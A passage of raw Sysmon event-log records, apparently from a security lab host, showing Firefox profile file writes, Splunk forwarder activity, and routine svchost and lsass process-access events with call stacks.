Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\default\moz-extension+++bf046f72-173e-4f01-a118-3e568a0f3047^userContextId=4294967295\idb\3647222921wleabcEoxlt-eengsairo.sqlite-journalMD5=1732803C6F5F826D68AF11007A184DDE,SHA256=0E0E3E9B27029628B0C4310EF70A84A8EA54AF2D8E3CDFD53C0D2ABF18F79388,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105241Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.746{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\default\moz-extension+++bf046f72-173e-4f01-a118-3e568a0f3047^userContextId=4294967295\idb\3647222921wleabcEoxlt-eengsairo.sqlite-journalMD5=41EDF63B0CB3258B3F53EF87C7BC0054,SHA256=1C123343A2C0AD6D2AF245A8CA8CDB96149FFDF854BFBB41A32AFF935BCA543B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105240Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.730{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CFD8A0D0D5C925EEB23B6CBF0E56A1B,SHA256=5FA5D3342A1683A748C6645E0E7065B13A39DCEF4BCAE5F1C92ED67E8A5C5B1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105239Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.730{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage.sqlite-journalMD5=57149013E065EA1E72E16A30E3BF4589,SHA256=E33CA91B59A1B177F74B887A99BD5E3967C3DFF174E6310D9DFEAB5668450B71,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105238Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.709{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a82909|C:\Program Files\Mozilla Firefox\xul.dll+9db572|C:\Program Files\Mozilla Firefox\xul.dll+8b0dba|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105237Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.709{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a82909|C:\Program Files\Mozilla Firefox\xul.dll+9db572|C:\Program Files\Mozilla Firefox\xul.dll+8b0dba|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105236Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.709{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a82909|C:\Program Files\Mozilla Firefox\xul.dll+9db572|C:\Program Files\Mozilla Firefox\xul.dll+8b0dba|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105235Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.709{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a82909|C:\Program Files\Mozilla Firefox\xul.dll+9db572|C:\Program Files\Mozilla Firefox\xul.dll+8b0dba|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105234Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.709{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a82909|C:\Program Files\Mozilla Firefox\xul.dll+9db572|C:\Program Files\Mozilla Firefox\xul.dll+8b0dba|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105233Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.709{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a82909|C:\Program Files\Mozilla Firefox\xul.dll+9db572|C:\Program Files\Mozilla Firefox\xul.dll+8b0dba|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105232Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.709{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a82909|C:\Program Files\Mozilla Firefox\xul.dll+9db572|C:\Program Files\Mozilla Firefox\xul.dll+8b0dba|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105231Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.709{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a82909|C:\Program Files\Mozilla Firefox\xul.dll+9db572|C:\Program Files\Mozilla Firefox\xul.dll+8b0dba|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105230Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.709{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a82909|C:\Program Files\Mozilla Firefox\xul.dll+9db572|C:\Program Files\Mozilla Firefox\xul.dll+8b0dba|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105229Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.709{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a82909|C:\Program Files\Mozilla Firefox\xul.dll+9db572|C:\Program Files\Mozilla Firefox\xul.dll+8b0dba|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105228Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.709{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a82909|C:\Program Files\Mozilla Firefox\xul.dll+9db572|C:\Program Files\Mozilla Firefox\xul.dll+8b0dba|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105227Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.709{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a82909|C:\Program Files\Mozilla Firefox\xul.dll+9db572|C:\Program Files\Mozilla Firefox\xul.dll+8b0dba|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105226Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.709{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105225Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.709{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a82909|C:\Program Files\Mozilla Firefox\xul.dll+9db572|C:\Program Files\Mozilla Firefox\xul.dll+8b0dba|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105224Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.693{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACA7-615A-1100-00000000FC01}360C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105223Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.693{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a82909|C:\Program Files\Mozilla Firefox\xul.dll+9db572|C:\Program Files\Mozilla Firefox\xul.dll+8b0dba|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105222Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.693{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105221Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.693{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105220Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.662{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla 